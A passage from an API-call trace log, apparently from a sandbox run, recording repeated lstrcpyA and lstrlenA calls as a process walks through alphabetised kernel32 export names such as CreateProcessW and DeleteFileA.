(lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.846] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.846] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.846] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.846] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.846] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.846] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.846] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.846] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.846] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.846] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.846] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.846] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.846] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.846] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.847] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.847] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.847] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.847] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.847] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.847] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.847] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.847] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.847] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.847] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.847] lstrlenA (lpString="COPYFILEA") returned 9 [0082.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.847] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.847] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.847] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.847] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.847] lstrlenA (lpString="COPYFILEW") returned 9 [0082.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.847] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.847] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.847] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.848] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.848] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.848] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.848] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.848] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.848] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.848] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.848] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.848] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.848] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.848] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.848] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.848] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.848] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.848] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.848] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.848] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.849] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.849] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.849] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.849] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.849] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.849] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.849] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.849] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.849] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.849] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.849] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.849] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.849] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.849] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.849] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.849] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.849] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.849] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.849] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.850] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.850] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.850] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.850] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.850] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.850] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.850] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.850] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.850] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.850] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.850] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.850] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.850] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.850] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.850] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.850] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.850] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.850] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.850] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.850] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.851] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.851] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.851] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.851] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.851] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.851] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.851] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.851] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.851] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.851] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.851] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.851] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.851] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.851] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.851] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.851] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.851] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.851] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.851] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.852] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.852] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.852] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.852] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.852] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.852] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.852] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.852] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.852] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.852] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.852] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.852] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.852] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.852] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.852] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.852] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.852] lstrlenA (lpString="DELETEATOM") returned 10 [0082.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.852] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.852] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.852] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.853] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.853] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.853] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.853] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.853] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.853] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.853] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.853] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.853] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: 